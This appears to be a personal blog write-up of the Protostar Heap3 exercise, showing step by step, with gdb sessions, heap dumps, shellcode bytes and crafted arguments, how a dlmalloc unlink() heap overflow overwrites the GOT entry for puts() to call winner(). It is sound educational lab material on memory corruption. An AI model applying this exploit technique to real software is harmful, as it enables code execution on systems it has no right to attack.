How to Exploit Dlmalloc Unlink(): Protostar Level Heap3

While stuck inside during social distancing, I’ve been making my way through LiveOverflow’s awesome Youtube playlist “Binary Exploitation / Memory Corruption.” His videos are structured around a well known series of exploit exercises here called “Protostar.” I took the time to truly understand each one before moving onto the next as the exercises build on each other. For the past several days I’ve been trying to understand the “Heap3” level, a relatively complex level that requires manipulating the heap to redirect code execution to an arbitrary function. After rewatching the video many times and reading numerous other online explanations, I finally understand! That moment of understanding feels so gratifying.

Many other resources already explain the exploit well, but I’m writing my own explanation to reinforce my understanding and to celebrate.

Exploit Exercise Protostar Heap3

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

void winner()
{
  printf("that wasn't too bad now, was it? @ %d\n", time(NULL));
}

int main(int argc, char **argv)
{
  char *a, *b, *c;

  a = malloc(32);
  b = malloc(32);
  c = malloc(32);

  strcpy(a, argv[1]);
  strcpy(b, argv[2]);
  strcpy(c, argv[3]);

  free(c);
  free(b);
  free(a);

  printf("dynamite failed?\n");
}

The source code is pretty straightforward. There’s the main() and winner() functions. There’s three character pointers, three malloc()’s, three strcpy()’s, three free()’s, and finally a printf(). Our goal is to redirect code execution from main() to winner().

The description at the top of the level is

This level introduces the Doug Lea Malloc (dlmalloc) and how heap meta data can be modified to change program execution.

All these exercises are on 32-bit x86 architecture.

Background on dlmalloc

The vulnerable malloc is usually referred to as dlmalloc (named after one of its authors Doug Lea) and must be an old version like this one from 1996. The Phrack article “Once Upon a free()…” provides useful background.

Most malloc implementations share the behaviour of storing their own management information, such as lists of used or free blocks, sizes of memory blocks and other useful data within the heap space itself.

The central attack of exploiting malloc allocated buffer overflows is to modify this management information in a way that will allow arbitrary memory overwrites afterwards.

For our purposes, skip to the “GNU C Library implementation” section. It says that memory slices or “chunks” created by malloc are organized like so. On 32-bit systems, prev_size and size are 4 bytes each. data is the user data section. malloc() returns a pointer to the address where data starts.

.            +----------------------------------+
    chunk -> | prev_size                        |
             +----------------------------------+
             | size                             |
             +----------------------------------+
      mem -> | data                             |
             : ...                              :
             +----------------------------------+
nextchunk -> | prev_size ...                    |
             :                                  :

The other important things to know about the vulnerable version(s) of dlmalloc are:

The lowest bit of size called PREV_INUSE indicates whether the previous chunk is used or not
Once we free() the chunk using free(mem), the memory is released, and if its neighboring chunks aren’t free, dlmalloc will clear the next chunk’s PREV_INUSE and add the chunk to a doubly-linked list of other free chunks. It does this by adding a forward and backward pointer at mem.

.            +----------------------------------+
    chunk -> | prev_size                        |
             +----------------------------------+
             | size                             |
             +----------------------------------+
      mem -> | fd                               |
             +----------------------------------+
             | bk                               |
             +----------------------------------+
             | (old memory, can be zero bytes)  |
             :                                  :

nextchunk -> | prev_size ...                    |
             :                                  :

If neighboring chunks are free, dlmalloc will merge the just freed chunk with its neighboring chunks. The two neighboring free chunks are in a doubly-linked list. dlmalloc first removes the neighboring chunk at the lower memory address from the list, merges it with the recently freed chunk, and repeats this for the neighboring chunk at the higher memory address. The unlinking is done with a macro called unlink() which removes an entry from a doubly-linked list and ties the loose ends of the list back together.

#define unlink(P, BK, FD)                                                     \
{                                                                             \
  BK = P->bk;                                                                 \
  FD = P->fd;                                                                 \
  FD->bk = BK;                                                                \
  BK->fd = FD;                                                                \
}                                                                             \

Written with pointer notation:

BK = *(P + 12);  # content of memory address P + 12 stored in BK
FD = *(P + 8);   # content of memory address P + 8 stored in FD
*(FD + 12) = BK; # set the content of memory address FD + 12 to BK
*(BK + 8) = FD;  # set the content of memory address BK + 8 to FD

Since we can overwrite the bytes of P, we can overwrite 4-bytes of memory at two arbitrary places. To trigger this code path, chunks being consolidated must be bigger than 80 bytes. dlmalloc classifies these chunks as “fastbins.”

An array of lists holding recently freed small chunks. Fastbins are not doubly linked.

What the heap looks like in heap3.c

Run gdb on heap3.c. My personal preference is to set the disassembly-flavor to intel and turn off pagination.

user@protostar:~$ cd /opt/protostar/bin

user@protostar:/opt/protostar/bin$ gdb heap3
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /opt/protostar/bin/heap3...done.

(gdb) set disassembly-flavor intel
(gdb) set pagination off

We first disassemble the main() function.

(gdb) disassemble main
Dump of assembler code for function main:
0x08048889 <main+0>:    push   ebp
0x0804888a <main+1>:    mov    ebp,esp
0x0804888c <main+3>:    and    esp,0xfffffff0
0x0804888f <main+6>:    sub    esp,0x20
0x08048892 <main+9>:    mov    DWORD PTR [esp],0x20
0x08048899 <main+16>:   call   0x8048ff2 <malloc>
0x0804889e <main+21>:   mov    DWORD PTR [esp+0x14],eax
0x080488a2 <main+25>:   mov    DWORD PTR [esp],0x20
0x080488a9 <main+32>:   call   0x8048ff2 <malloc>
0x080488ae <main+37>:   mov    DWORD PTR [esp+0x18],eax
0x080488b2 <main+41>:   mov    DWORD PTR [esp],0x20
0x080488b9 <main+48>:   call   0x8048ff2 <malloc>
0x080488be <main+53>:   mov    DWORD PTR [esp+0x1c],eax
0x080488c2 <main+57>:   mov    eax,DWORD PTR [ebp+0xc]
0x080488c5 <main+60>:   add    eax,0x4
0x080488c8 <main+63>:   mov    eax,DWORD PTR [eax]
0x080488ca <main+65>:   mov    DWORD PTR [esp+0x4],eax
0x080488ce <main+69>:   mov    eax,DWORD PTR [esp+0x14]
0x080488d2 <main+73>:   mov    DWORD PTR [esp],eax
0x080488d5 <main+76>:   call   0x8048750 <strcpy@plt>
0x080488da <main+81>:   mov    eax,DWORD PTR [ebp+0xc]
0x080488dd <main+84>:   add    eax,0x8
0x080488e0 <main+87>:   mov    eax,DWORD PTR [eax]
0x080488e2 <main+89>:   mov    DWORD PTR [esp+0x4],eax
0x080488e6 <main+93>:   mov    eax,DWORD PTR [esp+0x18]
0x080488ea <main+97>:   mov    DWORD PTR [esp],eax
0x080488ed <main+100>:  call   0x8048750 <strcpy@plt>
0x080488f2 <main+105>:  mov    eax,DWORD PTR [ebp+0xc]
0x080488f5 <main+108>:  add    eax,0xc
0x080488f8 <main+111>:  mov    eax,DWORD PTR [eax]
0x080488fa <main+113>:  mov    DWORD PTR [esp+0x4],eax
0x080488fe <main+117>:  mov    eax,DWORD PTR [esp+0x1c]
0x08048902 <main+121>:  mov    DWORD PTR [esp],eax
0x08048905 <main+124>:  call   0x8048750 <strcpy@plt>
0x0804890a <main+129>:  mov    eax,DWORD PTR [esp+0x1c]
0x0804890e <main+133>:  mov    DWORD PTR [esp],eax
0x08048911 <main+136>:  call   0x8049824 <free>
0x08048916 <main+141>:  mov    eax,DWORD PTR [esp+0x18]
0x0804891a <main+145>:  mov    DWORD PTR [esp],eax
0x0804891d <main+148>:  call   0x8049824 <free>
0x08048922 <main+153>:  mov    eax,DWORD PTR [esp+0x14]
0x08048926 <main+157>:  mov    DWORD PTR [esp],eax
0x08048929 <main+160>:  call   0x8049824 <free>
0x0804892e <main+165>:  mov    DWORD PTR [esp],0x804ac27
0x08048935 <main+172>:  call   0x8048790 <puts@plt>
0x0804893a <main+177>:  leave
0x0804893b <main+178>:  ret
End of assembler dump.

The printf has become a puts(). plt stands for procedure linkage table, one of the structures which makes dynamic loading and linking easier to use. @plt means we are calling puts at PLT entry at address 0x8048790. If we disassemble that address we see

(gdb) disassemble 0x8048790
Dump of assembler code for function puts@plt:
0x08048790 <puts@plt+0>:    jmp    DWORD PTR ds:0x804b128
0x08048796 <puts@plt+6>:    push   0x68
0x0804879b <puts@plt+11>:   jmp    0x80486b0
End of assembler dump.

It calls another function at address 0x804b128. This address is part of the Global Offset Table (GOT) which points to the dynamically linked library containing the actual puts() function.

(gdb) x 0x804b128
0x804b128 <_GLOBAL_OFFSET_TABLE_+64>:   0x08048796

We want to replace the call to puts() with a call to winner(). So we want to overwrite the contents of 0x804b128 in the GOT, currently 0x08048796, with the address to winner().

To get a visual sense of what the heap looks like, set breakpoints at every library function call, i.e. break at the address of malloc(), strcpy(), free(), and puts().

(gdb) break *0x8048ff2
Breakpoint 1 at 0x8048ff2: file common/malloc.c, line 3211.
(gdb) break *0x8048750
Breakpoint 2 at 0x8048750
(gdb) break *0x8049824
Breakpoint 3 at 0x8049824: file common/malloc.c, line 3583.
(gdb) break *0x8048790
Breakpoint 4 at 0x8048790

Run the program with some recognizable input strings.

(gdb) r AAAAAAAAAAAA BBBBBBBBBBBB CCCCCCCCCCCC
Starting program: /opt/protostar/bin/heap3 AAAAAAAAAAAA BBBBBBBBBBBB CCCCCCCCCCCC

Breakpoint 1, malloc (bytes=32) at common/malloc.c:3211
3211  common/malloc.c: No such file or directory.
  in common/malloc.c

We’ve hit the first breakpoint. Continue past it so that one malloc() is called and the heap is initialized.

(gdb) c
Continuing.

Breakpoint 1, malloc (bytes=32) at common/malloc.c:3211
3211  in common/malloc.c

Now look at the mapped memory regions.

(gdb) info proc mapping
process 1542
cmdline = '/opt/protostar/bin/heap3'
cwd = '/opt/protostar/bin'
exe = '/opt/protostar/bin/heap3'
Mapped address spaces:

  Start Addr   End Addr       Size     Offset objfile
   0x8048000  0x804b000     0x3000          0        /opt/protostar/bin/heap3
   0x804b000  0x804c000     0x1000     0x3000        /opt/protostar/bin/heap3
   0x804c000  0x804d000     0x1000          0           [heap]
  0xb7e96000 0xb7e97000     0x1000          0
  0xb7e97000 0xb7fd5000   0x13e000          0         /lib/libc-2.11.2.so
  0xb7fd5000 0xb7fd6000     0x1000   0x13e000         /lib/libc-2.11.2.so
  0xb7fd6000 0xb7fd8000     0x2000   0x13e000         /lib/libc-2.11.2.so
  0xb7fd8000 0xb7fd9000     0x1000   0x140000         /lib/libc-2.11.2.so
  0xb7fd9000 0xb7fdc000     0x3000          0
  0xb7fe0000 0xb7fe2000     0x2000          0
  0xb7fe2000 0xb7fe3000     0x1000          0           [vdso]
  0xb7fe3000 0xb7ffe000    0x1b000          0         /lib/ld-2.11.2.so
  0xb7ffe000 0xb7fff000     0x1000    0x1a000         /lib/ld-2.11.2.so
  0xb7fff000 0xb8000000     0x1000    0x1b000         /lib/ld-2.11.2.so
  0xbffeb000 0xc0000000    0x15000          0           [stack]

The heap starts at 0x804c000, ends at 0x804d000, and has size 0x1000 or 4096 bytes. We can define hooks in gdb. We define one to examine the first 56 words of the heap in hexadecimal every time execution stops.

(gdb) define hook-stop
Type commands for definition of "hook-stop".
End with a line saying just "end".
>x/56wx 0x804c000
>end

If we continue, we hit the third malloc. At this point two malloc()’s have been called.

(gdb) c
Continuing.
0x804c000: 0x00000000  0x00000029  0x00000000  0x00000000
0x804c010: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c020: 0x00000000  0x00000000  0x00000000  0x00000029
0x804c030: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c040: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c050: 0x00000000  0x00000fb1  0x00000000  0x00000000
0x804c060: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c070: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c080: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c090: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0a0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0b0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0c0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0d0: 0x00000000  0x00000000  0x00000000  0x00000000

Breakpoint 1, malloc (bytes=32) at common/malloc.c:3211
3211  in common/malloc.c

The second word of the chunk up to the last three bits indicates the chunk size in bytes. 0x29 is 0b101001. Without the last three bits it’s 0b101000 which is 40. We can see the chunk starts at 0x804c000 and ends at 0x804c028 which is the start of the next chunk. This range encompasses 10 words. Each word is 4 bytes which makes 10 * 4 = 40 bytes. The last bit of the size word indicates that the previous chunk is in use. By convention the first chunk has this bit turned on because there’s no previous chunk that’s free.

The second chunk resulting from the second malloc() starts at 0x804c028 and ends at 0x804c050. It’s identical to the first chunk. Continue past the third malloc().

(gdb) c
Continuing.
0x804c000: 0x00000000  0x00000029  0x00000000  0x00000000
0x804c010: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c020: 0x00000000  0x00000000  0x00000000  0x00000029
0x804c030: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c040: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c050: 0x00000000  0x00000029  0x00000000  0x00000000
0x804c060: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c070: 0x00000000  0x00000000  0x00000000  0x00000f89
0x804c080: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c090: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0a0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0b0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0c0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0d0: 0x00000000  0x00000000  0x00000000  0x00000000

Breakpoint 2, 0x08048750 in strcpy@plt ()

We see a third chunk is created. The number at the end (right now 0x00000f89) indicates the remaining size of the heap. It has been decreasing. Continue past the first strcpy().

(gdb) c
Continuing.
0x804c000: 0x00000000  0x00000029  0x41414141  0x41414141
0x804c010: 0x41414141  0x00000000  0x00000000  0x00000000
0x804c020: 0x00000000  0x00000000  0x00000000  0x00000029
0x804c030: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c040: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c050: 0x00000000  0x00000029  0x00000000  0x00000000
0x804c060: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c070: 0x00000000  0x00000000  0x00000000  0x00000f89
0x804c080: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c090: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0a0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0b0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0c0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0d0: 0x00000000  0x00000000  0x00000000  0x00000000

Breakpoint 2, 0x08048750 in strcpy@plt ()

We see the the 12 A’s (ASCII value 41) have been written to the heap. Continue two more times past the remaining two strcpy()’s.

(gdb) c
Continuing.
0x804c000: 0x00000000  0x00000029  0x41414141  0x41414141
0x804c010: 0x41414141  0x00000000  0x00000000  0x00000000
0x804c020: 0x00000000  0x00000000  0x00000000  0x00000029
0x804c030: 0x42424242  0x42424242  0x42424242  0x00000000
0x804c040: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c050: 0x00000000  0x00000029  0x00000000  0x00000000
0x804c060: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c070: 0x00000000  0x00000000  0x00000000  0x00000f89
0x804c080: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c090: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0a0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0b0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0c0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0d0: 0x00000000  0x00000000  0x00000000  0x00000000

Breakpoint 2, 0x08048750 in strcpy@plt ()
(gdb) c
Continuing.
0x804c000: 0x00000000  0x00000029  0x41414141  0x41414141
0x804c010: 0x41414141  0x00000000  0x00000000  0x00000000
0x804c020: 0x00000000  0x00000000  0x00000000  0x00000029
0x804c030: 0x42424242  0x42424242  0x42424242  0x00000000
0x804c040: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c050: 0x00000000  0x00000029  0x43434343  0x43434343
0x804c060: 0x43434343  0x00000000  0x00000000  0x00000000
0x804c070: 0x00000000  0x00000000  0x00000000  0x00000f89
0x804c080: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c090: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0a0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0b0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0c0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0d0: 0x00000000  0x00000000  0x00000000  0x00000000

Breakpoint 3, free (mem=0x804c058) at common/malloc.c:3583
3583  in common/malloc.c

We see the 12 B’s and C’s being written to their respective chunks. We are now at the first free(). Continue again.

(gdb) c
Continuing.
0x804c000: 0x00000000  0x00000029  0x41414141  0x41414141
0x804c010: 0x41414141  0x00000000  0x00000000  0x00000000
0x804c020: 0x00000000  0x00000000  0x00000000  0x00000029
0x804c030: 0x42424242  0x42424242  0x42424242  0x00000000
0x804c040: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c050: 0x00000000  0x00000029  0x00000000  0x43434343
0x804c060: 0x43434343  0x00000000  0x00000000  0x00000000
0x804c070: 0x00000000  0x00000000  0x00000000  0x00000f89
0x804c080: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c090: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0a0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0b0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0c0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0d0: 0x00000000  0x00000000  0x00000000  0x00000000

Breakpoint 3, free (mem=0x804c030) at common/malloc.c:3583
3583  in common/malloc.c

The first word of the third chunk’s data at 0x804c058 has been zeroed out. Continue.

(gdb) c
Continuing.
0x804c000: 0x00000000  0x00000029  0x41414141  0x41414141
0x804c010: 0x41414141  0x00000000  0x00000000  0x00000000
0x804c020: 0x00000000  0x00000000  0x00000000  0x00000029
0x804c030: 0x0804c050  0x42424242  0x42424242  0x00000000
0x804c040: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c050: 0x00000000  0x00000029  0x00000000  0x43434343
0x804c060: 0x43434343  0x00000000  0x00000000  0x00000000
0x804c070: 0x00000000  0x00000000  0x00000000  0x00000f89
0x804c080: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c090: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0a0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0b0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0c0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0d0: 0x00000000  0x00000000  0x00000000  0x00000000

Breakpoint 3, free (mem=0x804c008) at common/malloc.c:3583
3583  in common/malloc.c

0x804c030 now has 0x0804c050 which is a pointer to the start of the third chunk. This shows the second and third chunk are now tied together in a singly-linked list since they are small enough to be considered fastbins. Continue.

(gdb) c
Continuing.
0x804c000: 0x00000000  0x00000029  0x0804c028  0x41414141
0x804c010: 0x41414141  0x00000000  0x00000000  0x00000000
0x804c020: 0x00000000  0x00000000  0x00000000  0x00000029
0x804c030: 0x0804c050  0x42424242  0x42424242  0x00000000
0x804c040: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c050: 0x00000000  0x00000029  0x00000000  0x43434343
0x804c060: 0x43434343  0x00000000  0x00000000  0x00000000
0x804c070: 0x00000000  0x00000000  0x00000000  0x00000f89
0x804c080: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c090: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0a0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0b0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0c0: 0x00000000  0x00000000  0x00000000  0x00000000
0x804c0d0: 0x00000000  0x00000000  0x00000000  0x00000000

Breakpoint 4, 0x08048790 in puts@plt ()

Now the first chunk has been freed and address 0x804c008 has a pointer 0x0804c028 to the second chunk. If we continue, the program runs the printf("dynamite failed?\n"); line.

(gdb) c
Continuing.
dynamite failed?

Program exited with code 021.
0x804c000: Error while running hook_stop:
Cannot access memory at address 0x804c000

Crafting the exploit

Let’s work backwards. We can use unlink() to write the four byte address of a call to winner() to the GOT entry for puts(). Use objdump to find the address of winner().

user@protostar:$ objdump -t /opt/protostar/bin/heap3 | grep winner
08048864 g     F .text    00000025              winner

We can’t just put 0x08048864 in the GOT entry at 0x804b128 (why?). In order to call winner(), we’ll need to craft a payload that does so. Such a payload is often called “shellcode.” The following assembly code will do.

mov eax, 0x8048864
call eax

Using an online x86 assembler, the above in raw assembly is \xB8\x64\x88\x04\x08\xFF\xD0. We can store this in the heap’s first chunk whose data area starts at 0x804c008. Now we want to write 0x804c008 into the GOT entry for puts() at 0x804b128. Let’s go back to the unlink statements.

BK = *(P + 12);
FD = *(P + 8);
*(FD + 12) = BK;
*(BK + 8) = FD;

BK is the address of \xB8\x64\x88\x04\x08\xFF\xD0. Where should we store that? Let’s put it in the first chunk at 0x804c014. The first chunk’s data starts at 0x804c008, but we’ve seen the first byte is changed by dlmalloc when it’s freed. We don’t want our shellcode to be changed so we put it at a safe distance in the data at a +12-byte offset. 12 A’s can pad the shellcode enough to push it 12-bytes into the heap. We have enough info to construct the first command line argument.

user@protostar:$ echo -en "AAAAAAAAAAAA\xB8\x64\x88\x04\x08\xFF\xD0" > /tmp/A

We’ll store FD and BK in the third chunk. We can use the second command line argument to overwrite the size of the third chunk to be greater than 80 to trigger the unlink() macro when the third chunk is free()’d. The second argument needs to have enough characters to overflow its chunk. The chunk’s data starts at 0x804c030 and ends 32 bytes later at 0x804c050. The third chunk’s size is four bytes later at 0x804c054. So we can use 32 + 4 = 36 characters as padding. Let’s pick 100 as the size of the third chunk. 100 = 0x64. We also have to set the last bit to 1 to indicate the second or previous chunk is in use. So the third chunk’s size should be 0x65. So our second argument can have 36 B’s as padding followed by \x65.

user@protostar:$ echo -en "BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\x65" > /tmp/B

Now we craft the third and final argument. The structure for it will be some padding + some four bytes to be determined + some size + FD + BK.

The third chunk starts at 0x804c050. It used to end 40 bytes later at 0x804c078, but we overwrote its size to 0x65 or 100. So now it ends 100 bytes later at 0x804c0b4. We want to trigger unlink() on the third chunk when we free() it. We’ve already ensured it’s not a fastbin by setting its size to be greater than 80 bytes. The next condition is to make dlmalloc consolidate this chunk with either the chunk before or after. Since we’re using the previous chunk, let’s fool dlmalloc into thinking the next chunk is free.

I know what you’re thinking. There’s no fourth chunk. That’s right, but we’ll make dlmalloc think there is. In order to check a chunk is free, dlmalloc looks at the PREV_INUSE bit of the next chunk. To find the next chunk, dlmalloc adds the size of the current chunk to the current chunk’s address. You can see this at line 3259.

if (!(inuse_bit_at_offset(next, nextsz)))   /* consolidate forward */

inuse_bit_at_offset() is a macro defined at line 1410.

#define inuse_bit_at_offset(p, s) \
  (chunk_at_offset((p), (s))->size & PREV_INUSE)

chunk_at_offset() is defined at line 1381.

#define chunk_at_offset(p, s)  BOUNDED_1((mchunkptr)(((char*)(p)) + (s)))

So let’s write a small size at 0x804c0b8 to make dlmalloc think the fifth chunk is close by and so we don’t have to add too much padding to our third argument. A size like 0x20. We’ll have to write it as \x00\x00\x00\x20. But we have a problem here. C treats \x00 as the end of a string, and thus strcpy() will stop copying any string up to and including that NUL. We won’t be able to add any more bytes after that. This means we cannot insert \x00 in the middle of any of our inputs.

But all is not lost. We want a small number for the fourth chunk’s size. What’s another way of summing to a small number, at least in the way computers represent integers? In non-modular arithmetic, the only way two integers can produce a small sum is if they themselves are smaller. In modular arithmetic, a small integer can be the sum of large numbers that are greater than the modulus.

Take a closer look at how chunk_at_offset() is defined. It sums two numbers with no sanity checks. So we can write a really big number with no null bytes that strcpy() won’t stop on and will make dlmalloc think the next fifth chunk is close by. Even better, we can use the first byte of the fourth chunk as the fifth chunk’s size. How can we make dlmalloc think the fifth chunk is four bytes ahead of the fourth chunk? We do this with 0xfffffffc which is -2 in two’s complement for signed integers. So 0xfffffffc at 0x804c0b8 will point to a fifth chunk’s size four bytes earlier at 0x804c0b4. This word’s last bit must be set to 0 to indicate the fourth chunk is free. We can simply use 0xfffffffc again here.

We want (FD + 12) to equal 0x804b128. So FD should be 0x804b128 - 12 = 0x804b11c. In the above we decided to make BK 0x0804c014. We have

user@protostar:/tmp$ echo -en "CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\xfc\xff\xff\xff\xfc\xff\xff\xff\x1c\xb1\x04\x08\x14\xc0\x04\x08" > /tmp/C

92 C’s of padding, two 0xfffffffc words, FD, followed by BK.

Checking it works

With the same gdb session as above, run the program with the three arguments.

(gdb) r $(cat /tmp/A) $(cat /tmp/B) $(cat /tmp/C)
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/protostar/bin/heap3 $(cat /tmp/A) $(cat /tmp/B) $(cat /tmp/C)
0x804c000: Error while running hook_stop:
Cannot access memory at address 0x804c000

Breakpoint 1, malloc (bytes=32) at common/malloc.c:3211
3211  in common/malloc.c

Let’s continue until we stop at the first free() call.

(gdb) c
Continuing.
...

Breakpoint 3, free (mem=0x804c058) at common/malloc.c:3583
3583  in common/malloc.c

Examine the GOT entry for puts().

(gdb) x 0x804b128
0x804b128 <_GLOBAL_OFFSET_TABLE_+64>:   0x08048796

Continue and see that free(c) has overwritten the contents to the address of our shellcode!

(gdb) c
Continuing.
0x804c000: 0x00000000  0x00000029  0x41414141  0x41414141
0x804c010: 0x41414141  0x048864b8  0x00d0ff08  0x0804b11c
0x804c020: 0x00000000  0x00000000  0x00000000  0x00000029
0x804c030: 0x42424242  0x42424242  0x42424242  0x42424242
0x804c040: 0x42424242  0x42424242  0x42424242  0x42424242
0x804c050: 0x42424242  0x00000061  0x0804b194  0x0804b194
0x804c060: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c070: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c080: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c090: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c0a0: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c0b0: 0x00000060  0xfffffffc  0xfffffffc  0x0804b11c
0x804c0c0: 0x0804c014  0x00000000  0x00000000  0x00000000
0x804c0d0: 0x00000000  0x00000000  0x00000000  0x00000000

Breakpoint 3, free (mem=0x804c030) at common/malloc.c:3583
3583  in common/malloc.c
(gdb) x 0x804b128
0x804b128 <_GLOBAL_OFFSET_TABLE_+64>:   0x0804c014

Let the rest of the program run to see winner() is called.

Breakpoint 4, 0x08048790 in puts@plt ()
(gdb) si
0x804c000: 0x00000000  0x00000029  0x0804c028  0x41414141
0x804c010: 0x41414141  0x048864b8  0x00d0ff08  0x0804b11c
0x804c020: 0x00000000  0x00000000  0x00000000  0x00000029
0x804c030: 0x00000000  0x42424242  0x42424242  0x42424242
0x804c040: 0x42424242  0x42424242  0x42424242  0x42424242
0x804c050: 0x42424242  0x00000061  0x0804b194  0x0804b194
0x804c060: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c070: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c080: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c090: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c0a0: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c0b0: 0x00000060  0xfffffffc  0xfffffffc  0x0804b11c
0x804c0c0: 0x0804c014  0x00000000  0x00000000  0x00000000
0x804c0d0: 0x00000000  0x00000000  0x00000000  0x00000000
0x0804c014 in ?? ()
(gdb) si
0x804c000: 0x00000000  0x00000029  0x0804c028  0x41414141
0x804c010: 0x41414141  0x048864b8  0x00d0ff08  0x0804b11c
0x804c020: 0x00000000  0x00000000  0x00000000  0x00000029
0x804c030: 0x00000000  0x42424242  0x42424242  0x42424242
0x804c040: 0x42424242  0x42424242  0x42424242  0x42424242
0x804c050: 0x42424242  0x00000061  0x0804b194  0x0804b194
0x804c060: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c070: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c080: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c090: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c0a0: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c0b0: 0x00000060  0xfffffffc  0xfffffffc  0x0804b11c
0x804c0c0: 0x0804c014  0x00000000  0x00000000  0x00000000
0x804c0d0: 0x00000000  0x00000000  0x00000000  0x00000000
0x0804c019 in ?? ()
(gdb) si
0x804c000: 0x00000000  0x00000029  0x0804c028  0x41414141
0x804c010: 0x41414141  0x048864b8  0x00d0ff08  0x0804b11c
0x804c020: 0x00000000  0x00000000  0x00000000  0x00000029
0x804c030: 0x00000000  0x42424242  0x42424242  0x42424242
0x804c040: 0x42424242  0x42424242  0x42424242  0x42424242
0x804c050: 0x42424242  0x00000061  0x0804b194  0x0804b194
0x804c060: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c070: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c080: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c090: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c0a0: 0x43434343  0x43434343  0x43434343  0x43434343
0x804c0b0: 0x00000060  0xfffffffc  0xfffffffc  0x0804b11c
0x804c0c0: 0x0804c014  0x00000000  0x00000000  0x00000000
0x804c0d0: 0x00000000  0x00000000  0x00000000  0x00000000
winner () at heap3/heap3.c:8
8 heap3/heap3.c: No such file or directory.
  in heap3/heap3.c
(gdb) c
Continuing.
that wasn't too bad now, was it? @ 1587442625

Program received signal SIGSEGV, Segmentation fault.
0x804c000: 0x00000000  0x00000029  0x0804c028  0x41414141
0x804c010: 0x41414141  0x048864b8  0x00d0ff08  0x0804b11c
0x804c020: 0x00000000  0x00000000  0x00000000  0x00000029
0x804c030: 0x00000000  0x42424242  0x42424242  0x42424242
0x804c040: 0x42424242  0x42424242  0x42424242  0x42424242
